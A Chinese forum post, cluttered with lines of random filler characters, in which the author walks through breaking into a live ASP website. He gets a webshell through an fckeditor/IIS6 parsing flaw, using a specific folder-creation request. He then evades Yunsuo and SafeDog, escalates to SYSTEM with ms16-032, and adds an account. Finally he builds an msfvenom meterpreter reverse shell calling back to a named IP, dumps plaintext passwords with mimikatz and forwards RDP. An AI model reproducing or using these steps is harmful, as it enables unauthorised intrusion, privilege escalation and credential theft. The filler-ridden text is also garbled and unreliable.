|
+ X7 v$ y2 b( k. Q* l# J% b 1 D( P) v+ i+ g5 B% q( l6 {
7 W. F9 e' V/ m
% q% \/ i" S% D8 |2 A' w
| 1 ?8 {& O$ P. g3 w, l6 l9 x! f/ Z
( ~% k. R4 @$ j5 }+ o+ z4 L1 |
7 P! z. D Q2 Z. c' @
一、 利用getwebshell篇
% o! a/ L( p* _$ z, T4 i5 [, P
6 X: ]6 S5 z" x& v! W- p首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
/ u0 F) @# e+ w% T3 D" D4 G
, ]* |- F/ d: q0 I6 d. E- n; r
# N. s" o8 L* V5 _ u" \下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
: x' w' x6 E% d% Z3 v2 V# }" z
+ a6 [$ ~0 v0 O, B5 m, p8 |下面我们构造一个asp目录,如:
( s; q. j9 }& ]$ k ' k) o- @6 b0 n) I! ~3 D
/ Z! t* M: |+ o, _) P% A7 M
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 . y- W# c2 B# U' z5 e5 ^8 _
, }2 ?- ]# n) w
/ U7 A) e& e( j/ ]. _- g' F' e; m 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
3 {* F+ T& I& N2 k+ L
' D! I3 a5 l" v ?, U一、 绕过安全狗云锁提权并且加账号
& x4 g: y- Y- ?# M4 n
' G# X) T# A$ }& |7 I U没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
& g- K3 j7 o# N6 j; }1 g& A3 i
+ R7 n% }" e& w7 w" v3 x
如图:
) v4 @, t. R& ~, j7 L6 b, K
z+ |( G1 i8 u, l然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
, ~- h8 P+ V& g' o/ N
& h. T2 @2 g; A" h
一、 利用metasploit
8 n, K% m7 T, c! {+ q
+ i# [! p h$ m# i1 G# s
首先用pentestbox生成一个64位的payload如下命令
( Z2 O+ ^! N1 A5 g' @; N* K3 [
# [3 f1 _8 X% a- C$ g! R9 W0 A
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
& r4 v1 X0 q. `5 \& ^
1 e( z; ^, B1 @# _" b% x" x( B# v. i为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
* ]& N8 i' R& i5 R# w+ L6 F/ |# M
1 T' {; W# C1 ?3 t3 r. s下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
0 d! v5 ^) ?: q0 K
/ j: a4 E) ]( h下面我们来做一个监听如下命令:
) Y2 ]) @% ?* e6 c D0 {& t
+ u7 G) e: `1 a" a4 H
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
( w: X! @; e% b/ v
 5 s8 P8 z6 m/ w; _& d2 j! c
2 v+ W+ s6 @( D |
. ]1 w+ T: ?) I; p
7 B& s2 {: @7 e; k; b! \
0 J; P4 I% S& K; Y 4 o- D! y; m: K S. b/ X4 x
( |0 w- d6 J& D* u8 q" ?8 v
! W) s h, @1 f
9 T# Q! i, h( B, G" s
+ L; D( T( u0 r3 s2 s1 ]+ m
1 L+ v( S g2 }+ ]& Y! { 5 A: p& L9 g: J
9 V! h8 ]$ i7 z% t1 m ! G" B8 ~) g/ t7 l( @ p8 N
. n0 f+ U/ o% L8 }% n
# ~3 t/ t' u' P; E1 D) ?, P8 N
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06